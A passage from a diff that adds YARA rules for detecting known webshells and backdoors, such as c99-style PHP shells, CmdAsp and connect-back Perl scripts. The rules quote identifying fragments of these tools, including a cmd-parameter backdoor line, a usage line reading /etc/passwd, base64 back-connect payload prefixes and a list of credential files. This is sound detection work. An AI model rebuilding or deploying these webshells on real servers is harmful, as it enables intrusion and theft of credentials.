+ $s1 = "News Remote PHP Shell Injection"
+ $s3 = "Php Shell <br />" fullword
+ $s4 = "<input type = \"text\" name = \"url\" value = \""
+ condition:
+ 2 of them
+}
+rule sig_2008_php_php {
+ meta:
+ description = "Semi-Auto-generated - file 2008.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "3e4ba470d4c38765e4b16ed930facf2c"
+ strings:
+ $s0 = "Codz by angel(4ngel)"
+ $s1 = "Web: http://www.4ngel.net"
+ $s2 = "$admin['cookielife'] = 86400;"
+ $s3 = "$errmsg = 'The file you want Downloadable was nonexistent';"
+ condition:
+ 1 of them
+}
+rule ak74shell_php_php {
+ meta:
+ description = "Semi-Auto-generated - file ak74shell.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "7f83adcb4c1111653d30c6427a94f66f"
+ strings:
+ $s1 = "$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_SESSION["
+ $s2 = "AK-74 Security Team Web Site: www.ak74-team.net"
+ $s3 = "$xshell"
+ condition:
+ 2 of them
+}
+rule Rem_View_php_php {
+ meta:
+ description = "Semi-Auto-generated - file Rem View.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "29420106d9a81553ef0d1ca72b9934d9"
+ strings:
+ $s0 = "$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\""
+ $s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
+ $s4 ="Welcome to phpRemoteView (RemView)"
+ condition:
+ 1 of them
+}
+rule Java_Shell_js {
+ meta:
+ description = "Semi-Auto-generated - file Java Shell.js.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "36403bc776eb12e8b7cc0eb47c8aac83"
+ strings:
+ $s2 = "PySystemState.initialize(System.getProperties(), null, argv);" fullword
+ $s3 = "public class JythonShell extends JPanel implements Runnable {" fullword
+ $s4 = "public static int DEFAULT_SCROLLBACK = 100"
+ condition:
+ 2 of them
+}
+rule STNC_php_php {
+ meta:
+ description = "Semi-Auto-generated - file STNC.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "2e56cfd5b5014cbbf1c1e3f082531815"
+ strings:
+ $s0 = "drmist.ru" fullword
+ $s1 = "hidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80"
+ $s2 = "STNC WebShell"
+ $s3 = "http://www.security-teams.net/index.php?showtopic="
+ condition:
+ 1 of them
+}
+rule aZRaiLPhp_v1_0_php {
+ meta:
+ description = "Semi-Auto-generated - file aZRaiLPhp v1.0.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "26b2d3943395682e36da06ed493a3715"
+ strings:
+ $s0 = "azrailphp"
+ $s1 = "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>"
+ $s3 = "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>"
+ condition:
+ 2 of them
+}
+rule Moroccan_Spamers_Ma_EditioN_By_GhOsT_php {
+ meta:
+ description = "Semi-Auto-generated - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "d1b7b311a7ffffebf51437d7cd97dc65"
+ strings:
+ $s0 = ";$sd98=\"john.barker446@gmail.com\""
+ $s1 = "print \"Sending mail to $to....... \";"
+ $s2 = "<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei"
+ condition:
+ 1 of them
+}
+rule zacosmall_php {
+ meta:
+ description = "Semi-Auto-generated - file zacosmall.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "5295ee8dc2f5fd416be442548d68f7a6"
+ strings:
+ $s0 = "rand(1,99999);$sj98"
+ $s1 = "$dump_file.='`'.$rows2[0].'`"
+ $s3 = "filename=\\\"dump_{$db_dump}_${table_d"
+ condition:
+ 2 of them
+}
+rule CmdAsp_asp {
+ meta:
+ description = "Semi-Auto-generated - file CmdAsp.asp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "64f24f09ec6efaa904e2492dffc518b9"
+ strings:
+ $s0 = "CmdAsp.asp"
+ $s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
+ $s2 = "-- Use a poor man's pipe ... a temp file --"
+ $s3 = "maceo @ dogmile.com"
+ condition:
+ 2 of them
+}
+rule simple_backdoor_php {
+ meta:
+ description = "Semi-Auto-generated - file simple-backdoor.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "f091d1b9274c881f8e41b2f96e6b9936"
+ strings:
+ $s0 = "$cmd = ($_REQUEST['cmd']);" fullword
+ $s1 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->"
+ $s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
+ condition:
+ 2 of them
+}
+rule mysql_shell_php {
+ meta:
+ description = "Semi-Auto-generated - file mysql_shell.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "d42aec2891214cace99b3eb9f3e21a63"
+ strings:
+ $s0 = "SooMin Kim"
+ $s1 = "smkim@popeye.snu.ac.kr"
+ $s2 = "echo \"<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen"
+ condition:
+ 1 of them
+}
+rule Dive_Shell_1_0___Emperor_Hacking_Team_php {
+ meta:
+ description = "Semi-Auto-generated - file Dive Shell 1.0 - Emperor Hacking Team.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "1b5102bdc41a7bc439eea8f0010310a5"
+ strings:
+ $s0 = "Emperor Hacking TEAM"
+ $s1 = "Simshell" fullword
+ $s2 = "ereg('^[[:blank:]]*cd[[:blank:]]"
+ $s3 = "<form name=\"shell\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST"
+ condition:
+ 2 of them
+}
+rule Asmodeus_v0_1_pl {
+ meta:
+ description = "Semi-Auto-generated - file Asmodeus v0.1.pl.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "0978b672db0657103c79505df69cb4bb"
+ strings:
+ $s0 = "[url=http://www.governmentsecurity.org"
+ $s1 = "perl asmodeus.pl client 6666 127.0.0.1"
+ $s2 = "print \"Asmodeus Perl Remote Shell"
+ $s4 = "$internet_addr = inet_aton(\"$host\") or die \"ALOA:$!\\n\";" fullword
+ condition:
+ 2 of them
+}
+rule backup_php_often_with_c99shell {
+ meta:
+ description = "Semi-Auto-generated - file backup.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "aeee3bae226ad57baf4be8745c3f6094"
+ strings:
+ $s0 = "#phpMyAdmin MySQL-Dump" fullword
+ $s2 = ";db_connect();header('Content-Type: application/octetstr"
+ $s4 = "$data .= \"#Database: $database" fullword
+ condition:
+ all of them
+}
+rule Reader_asp {
+ meta:
+ description = "Semi-Auto-generated - file Reader.asp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "ad1a362e0a24c4475335e3e891a01731"
+ strings:
+ $s1 = "Mehdi & HolyDemon"
+ $s2 = "www.infilak."
+ $s3 = "'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width=\"75%"
+ condition:
+ 2 of them
+}
+rule phpshell17_php {
+ meta:
+ description = "Semi-Auto-generated - file phpshell17.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "9a928d741d12ea08a624ee9ed5a8c39d"
+ strings:
+ $s0 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>" fullword
+ $s1 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></"
+ $s2 = "href=\"mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>" fullword
+ condition:
+ 1 of them
+}
+rule myshell_php_php {
+ meta:
+ description = "Semi-Auto-generated - file myshell.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "62783d1db52d05b1b6ae2403a7044490"
+ strings:
+ $s0 = "@chdir($work_dir) or ($shellOutput = \"MyShell: can't change directory."
+ $s1 = "echo \"<font color=$linkColor><b>MyShell file editor</font> File:<font color"
+ $s2 = " $fileEditInfo = \" ::::::: Owner: <font color=$"
+ condition:
+ 2 of them
+}
+rule SimShell_1_0___Simorgh_Security_MGZ_php {
+ meta:
+ description = "Semi-Auto-generated - file SimShell 1.0 - Simorgh Security MGZ.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "37cb1db26b1b0161a4bf678a6b4565bd"
+ strings:
+ $s0 = "Simorgh Security Magazine "
+ $s1 = "Simshell.css"
+ $s2 = "} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], "
+ $s3 = "www.simorgh-ev.com"
+ condition:
+ 2 of them
+}
+rule jspshall_jsp {
+ meta:
+ description = "Semi-Auto-generated - file jspshall.jsp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "efe0f6edaa512c4e1fdca4eeda77b7ee"
+ strings:
+ $s0 = "kj021320"
+ $s1 = "case 'T':systemTools(out);break;"
+ $s2 = "out.println(\"<tr><td>\"+ico(50)+f[i].getName()+\"</td><td> file"
+ condition:
+ 2 of them
+}
+rule webshell_php {
+ meta:
+ description = "Semi-Auto-generated - file webshell.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "e425241b928e992bde43dd65180a4894"
+ strings:
+ $s2 = "<die(\"Couldn't Read directory, Blocked!!!\");"
+ $s3 = "PHP Web Shell"
+ condition:
+ all of them
+}
+rule rootshell_php {
+ meta:
+ description = "Semi-Auto-generated - file rootshell.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "265f3319075536030e59ba2f9ef3eac6"
+ strings:
+ $s0 = "shells.dl.am"
+ $s1 = "This server has been infected by $owner"
+ $s2 = "<input type=\"submit\" value=\"Include!\" name=\"inc\"></p>"
+ $s4 = "Could not write to file! (Maybe you didn't enter any text?)"
+ condition:
+ 2 of them
+}
+rule connectback2_pl {
+ meta:
+ description = "Semi-Auto-generated - file connectback2.pl.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "473b7d226ea6ebaacc24504bd740822e"
+ strings:
+ $s0 = "#We Are: MasterKid, AleXutz, FatMan & MiKuTuL "
+ $s1 = "echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel"
+ $s2 = "ConnectBack Backdoor"
+ condition:
+ 1 of them
+}
+rule DefaceKeeper_0_2_php {
+ meta:
+ description = "Semi-Auto-generated - file DefaceKeeper_0.2.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "713c54c3da3031bc614a8a55dccd7e7f"
+ strings:
+ $s0 = "target fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>" fullword
+ $s1 = "eval(base64_decode(\"ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9"
+ $s2 = "<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center"
+ condition:
+ 1 of them
+}
+rule shells_PHP_wso {
+ meta:
+ description = "Semi-Auto-generated - file wso.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "33e2891c13b78328da9062fbfcf898b6"
+ strings:
+ $s0 = "$back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi"
+ $s3 = "echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos"
+ condition:
+ 1 of them
+}
+rule backdoor1_php {
+ meta:
+ description = "Semi-Auto-generated - file backdoor1.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "e1adda1f866367f52de001257b4d6c98"
+ strings:
+ $s1 = "echo \"[DIR] <A HREF=\\\"\".$_SERVER['PHP_SELF'].\"?rep=\".realpath($rep.\".."
+ $s2 = "class backdoor {"
+ $s4 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?copy=1\\\">Copier un fichier</a> <"
+ condition:
+ 1 of them
+}
+rule elmaliseker_asp {
+ meta:
+ description = "Semi-Auto-generated - file elmaliseker.asp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "b32d1730d23a660fd6aa8e60c3dc549f"
+ strings:
+ $s0 = "if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & \"@\" & makeText(8) & \".\""
+ $s1 = "<form name=frmCMD method=post action=\"<%=gURL%>\">"
+ $s2 = "dim zombie_array,special_array"
+ $s3 = "http://vnhacker.org"
+ condition:
+ 1 of them
+}
+rule indexer_asp {
+ meta:
+ description = "Semi-Auto-generated - file indexer.asp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "9ea82afb8c7070817d4cdf686abe0300"
+ strings:
+ $s0 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
+ $s2 = "D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type=\"submit"
+ condition:
+ 1 of them
+}
+rule DxShell_php_php {
+ meta:
+ description = "Semi-Auto-generated - file DxShell.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "33a2b31810178f4c2e71fbdeb4899244"
+ strings:
+ $s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+ $s2 = "print \"\\n\".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><"
+ condition:
+ 1 of them
+}
+rule s72_Shell_v1_1_Coding_html {
+ meta:
+ description = "Semi-Auto-generated - file s72 Shell v1.1 Coding.html.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "c2e8346a5515c81797af36e7e4a3828e"
+ strings:
+ $s0 = "Dizin</font></b></font><font face=\"Verdana\" style=\"font-size: 8pt\"><"
+ $s1 = "s72 Shell v1.0 Codinf by Cr@zy_King"
+ $s3 = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\""
+ condition:
+ 1 of them
+}
+rule hidshell_php_php {
+ meta:
+ description = "Semi-Auto-generated - file hidshell.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "c2f3327d60884561970c63ffa09439a4"
+ strings:
+ $s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U"
+ condition:
+ all of them
+}
+rule kacak_asp {
+ meta:
+ description = "Semi-Auto-generated - file kacak.asp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "907d95d46785db21331a0324972dda8c"
+ strings:
+ $s0 = "Kacak FSO 1.0"
+ $s1 = "if request.querystring(\"TGH\") = \"1\" then"
+ $s3 = "<font color=\"#858585\">BuqX</font></a></font><font face=\"Verdana\" style="
+ $s4 = "mailto:BuqX@hotmail.com"
+ condition:
+ 1 of them
+}
+rule PHP_Backdoor_Connect_pl_php {
+ meta:
+ description = "Semi-Auto-generated - file PHP Backdoor Connect.pl.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "57fcd9560dac244aeaf95fd606621900"
+ strings:
+ $s0 = "LorD of IRAN HACKERS SABOTAGE"
+ $s1 = "LorD-C0d3r-NT"
+ $s2 = "echo --==Userinfo==-- ;"
+ condition:
+ 1 of them
+}
+rule Antichat_Socks5_Server_php_php {
+ meta:
+ description = "Semi-Auto-generated - file Antichat Socks5 Server.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "cbe9eafbc4d86842a61a54d98e5b61f1"
+ strings:
+ $s0 = "$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);" fullword
+ $s3 = "# [+] Domain name address type"
+ $s4 = "www.antichat.ru"
+ condition:
+ 1 of them
+}
+rule Antichat_Shell_v1_3_php {
+ meta:
+ description = "Semi-Auto-generated - file Antichat Shell v1.3.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "40d0abceba125868be7f3f990f031521"
+ strings:
+ $s0 = "Antichat"
+ $s1 = "Can't open file, permission denide"
+ $s2 = "$ra44"
+ condition:
+ 2 of them
+}
+rule Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_php {
+ meta:
+ description = "Semi-Auto-generated - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "49ad9117c96419c35987aaa7e2230f63"
+ strings:
+ $s0 = "Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy"
+ $s1 = "Mode Shell v1.0</font></span>"
+ $s2 = "has been already loaded. PHP Emperor <xb5@hotmail."
+ condition:
+ 1 of them
+}
+rule mysql_php_php {
+ meta:
+ description = "Semi-Auto-generated - file mysql.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "12bbdf6ef403720442a47a3cc730d034"
+ strings:
+ $s0 = "action=mysqlread&mass=loadmass\">load all defaults"
+ $s2 = "if (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthru"
+ $s3 = "$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = "
+ condition:
+ 1 of them
+}
+rule Worse_Linux_Shell_php {
+ meta:
+ description = "Semi-Auto-generated - file Worse Linux Shell.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "8338c8d9eab10bd38a7116eb534b5fa2"
+ strings:
+ $s1 = "print \"<tr><td><b>Server is:</b></td><td>\".$_SERVER['SERVER_SIGNATURE'].\"</td"
+ $s2 = "print \"<tr><td><b>Execute command:</b></td><td><input size=100 name=\\\"_cmd"
+ condition:
+ 1 of them
+}
+rule cyberlords_sql_php_php {
+ meta:
+ description = "Semi-Auto-generated - file cyberlords_sql.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "03b06b4183cb9947ccda2c3d636406d4"
+ strings:
+ $s0 = "Coded by n0 [nZer0]"
+ $s1 = " www.cyberlords.net"
+ $s2 = "U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE"
+ $s3 = "return \"<BR>Dump error! Can't write to \".htmlspecialchars($file);"
+ condition:
+ 1 of them
+}
+rule cmd_asp_5_1_asp {
+ meta:
+ description = "Semi-Auto-generated - file cmd-asp-5.1.asp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "8baa99666bf3734cbdfdd10088e0cd9f"
+ strings:
+ $s0 = "Call oS.Run(\"win.com cmd.exe /c del \"& szTF,0,True)" fullword
+ $s3 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
+ condition:
+ 1 of them
+}
+rule pws_php_php {
+ meta:
+ description = "Semi-Auto-generated - file pws.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "ecdc6c20f62f99fa265ec9257b7bf2ce"
+ strings:
+ $s0 = "<div align=\"left\"><font size=\"1\">Input command :</font></div>" fullword
+ $s1 = "<input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br>" fullword
+ $s4 = "<input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>"
+ condition:
+ 2 of them
+}
+rule PHP_Shell_php_php {
+ meta:
+ description = "Semi-Auto-generated - file PHP Shell.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
+ strings:
+ $s0 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
+ $s1 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
+ condition:
+ all of them
+}
+rule Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html {
+ meta:
+ description = "Semi-Auto-generated - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "8a8c8bb153bd1ee097559041f2e5cf0a"
+ strings:
+ $s0 = "Ayyildiz"
+ $s1 = "TouCh By iJOo"
+ $s2 = "First we check if there has been asked for a working directory"
+ $s3 = "http://ayyildiz.org/images/whosonline2.gif"
+ condition:
+ 2 of them
+}
+rule EFSO_2_asp {
+ meta:
+ description = "Semi-Auto-generated - file EFSO_2.asp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "b5fde9682fd63415ae211d53c6bfaa4d"
+ strings:
+ $s0 = "Ejder was HERE"
+ $s1 = "*~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~"
+ condition:
+ 2 of them
+}
+rule lamashell_php {
+ meta:
+ description = "Semi-Auto-generated - file lamashell.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "de9abc2e38420cad729648e93dfc6687"
+ strings:
+ $s0 = "lama's'hell" fullword
+ $s1 = "if($_POST['king'] == \"\") {"
+ $s2 = "if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir.\"/\".$_FILES['f"
+ condition:
+ 1 of them
+}
+rule Ajax_PHP_Command_Shell_php {
+ meta:
+ description = "Semi-Auto-generated - file Ajax_PHP Command Shell.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "93d1a2e13a3368a2472043bd6331afe9"
+ strings:
+ $s1 = "newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>"
+ $s2 = "Empty Command..type \\\"shellhelp\\\" for some ehh...help"
+ $s3 = "newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct"
+ condition:
+ 1 of them
+}
+rule JspWebshell_1_2_jsp {
+ meta:
+ description = "Semi-Auto-generated - file JspWebshell 1.2.jsp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "70a0ee2624e5bbe5525ccadc467519f6"
+ strings:
+ $s0 = "JspWebshell"
+ $s1 = "CreateAndDeleteFolder is error:"
+ $s2 = "<td width=\"70%\" height=\"22\"> <%=env.queryHashtable(\"java.c"
+ $s3 = "String _password =\"111\";"
+ condition:
+ 2 of them
+}
+rule Sincap_php_php {
+ meta:
+ description = "Semi-Auto-generated - file Sincap.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "b68b90ff6012a103e57d141ed38a7ee9"
+ strings:
+ $s0 = "$baglan=fopen(\"/tmp/$ekinci\",'r');"
+ $s2 = "$tampon4=$tampon3-1"
+ $s3 = "@aventgrup.net"
+ condition:
+ 2 of them
+}
+rule Test_php_php {
+ meta:
+ description = "Semi-Auto-generated - file Test.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "77e331abd03b6915c6c6c7fe999fcb50"
+ strings:
+ $s0 = "$yazi = \"test\" . \"\\r\\n\";" fullword
+ $s2 = "fwrite ($fp, \"$yazi\");" fullword
+ $s3 = "$entry_line=\"HACKed by EntriKa\";" fullword
+ condition:
+ 1 of them
+}
+rule Phyton_Shell_py {
+ meta:
+ description = "Semi-Auto-generated - file Phyton Shell.py.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "92b3c897090867c65cc169ab037a0f55"
+ strings:
+ $s1 = "sh_out=os.popen(SHELL+\" \"+cmd).readlines()" fullword
+ $s2 = "# d00r.py 0.3a (reverse|bind)-shell in python by fQ" fullword
+ $s3 = "print \"error; help: head -n 16 d00r.py\"" fullword
+ $s4 = "print \"PW:\",PW,\"PORT:\",PORT,\"HOST:\",HOST" fullword
+ condition:
+ 1 of them
+}
+rule mysql_tool_php_php {
+ meta:
+ description = "Semi-Auto-generated - file mysql_tool.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "5fbe4d8edeb2769eda5f4add9bab901e"
+ strings:
+ $s0 = "$error_text = '<strong>Failed selecting database \"'.$this->db['"
+ $s1 = "$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERV"
+ $s4 = "<div align=\"center\">The backup process has now started<br "
+ condition:
+ 1 of them
+}
+rule Zehir_4_asp {
+ meta:
+ description = "Semi-Auto-generated - file Zehir 4.asp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "7f4e12e159360743ec016273c3b9108c"
+ strings:
+ $s2 = "</a><a href='\"&dosyapath&\"?status=10&dPath=\"&f1.path&\"&path=\"&path&\"&Time="
+ $s4 = "<input type=submit value=\"Test Et!\" onclick=\""
+ condition:
+ 1 of them
+}
+rule sh_php_php {
+ meta:
+ description = "Semi-Auto-generated - file sh.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "330af9337ae51d0bac175ba7076d6299"
+ strings:
+ $s1 = "$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e"
+ $s2 = "Show <input type=text size=5 value=\".((isset($_POST['br_st']))?$_POST['br_st']:"
+ condition:
+ 1 of them
+}
+rule phpbackdoor15_php {
+ meta:
+ description = "Semi-Auto-generated - file phpbackdoor15.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "0fdb401a49fc2e481e3dfd697078334b"
+ strings:
+ $s1 = "echo \"fichier telecharge dans \".good_link(\"./\".$_FILES[\"fic\"][\"na"
+ $s2 = "if(move_uploaded_file($_FILES[\"fic\"][\"tmp_name\"],good_link(\"./\".$_FI"
+ $s3 = "echo \"Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s"
+ condition:
+ 1 of them
+}
+rule phpjackal_php {
+ meta:
+ description = "Semi-Auto-generated - file phpjackal.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "ab230817bcc99acb9bdc0ec6d264d76f"
+ strings:
+ $s3 = "$dl=$_REQUEST['downloaD'];"
+ $s4 = "else shelL(\"perl.exe $name $port\");"
+ condition:
+ 1 of them
+}
+rule sql_php_php {
+ meta:
+ description = "Semi-Auto-generated - file sql.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "8334249cbb969f2d33d678fec2b680c5"
+ strings:
+ $s1 = "fputs ($fp, \"# RST MySQL tools\\r\\n# Home page: http://rst.void.ru\\r\\n#"
+ $s2 = "http://rst.void.ru"
+ $s3 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
+ condition:
+ 1 of them
+}
+rule cgi_python_py {
+ meta:
+ description = "Semi-Auto-generated - file cgi-python.py.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "0a15f473e2232b89dae1075e1afdac97"
+ strings:
+ $s0 = "a CGI by Fuzzyman"
+ $s1 = "\"\"\"+fontline +\"Version : \" + versionstring + \"\"\", Running on : \"\"\" + "
+ $s2 = "values = map(lambda x: x.value, theform[field]) # allows for"
+ condition:
+ 1 of them
+}
+rule ru24_post_sh_php_php {
+ meta:
+ description = "Semi-Auto-generated - file ru24_post_sh.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "5b334d494564393f419af745dc1eeec7"
+ strings:
+ $s1 = "<title>Ru24PostWebShell - \".$_POST['cmd'].\"</title>" fullword
+ $s3 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
+ $s4 = "Writed by DreAmeRz" fullword
+ condition:
+ 1 of them
+}
+rule DTool_Pro_php {
+ meta:
+ description = "Semi-Auto-generated - file DTool Pro.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "366ad973a3f327dfbfb915b0faaea5a6"
+ strings:
+ $s0 = "r3v3ng4ns\\nDigite"
+ $s1 = "if(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: It seems that the permissi"
+ $s3 = "if (empty($cmd) and $ch_msg==\"\") echo (\"Comandos Exclusivos do DTool Pro\\n"
+ condition:
+ 1 of them
+}
+rule telnetd_pl {
+ meta:
+ description = "Semi-Auto-generated - file telnetd.pl.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "5f61136afd17eb025109304bd8d6d414"
+ strings:
+ $s0 = "0ldW0lf" fullword
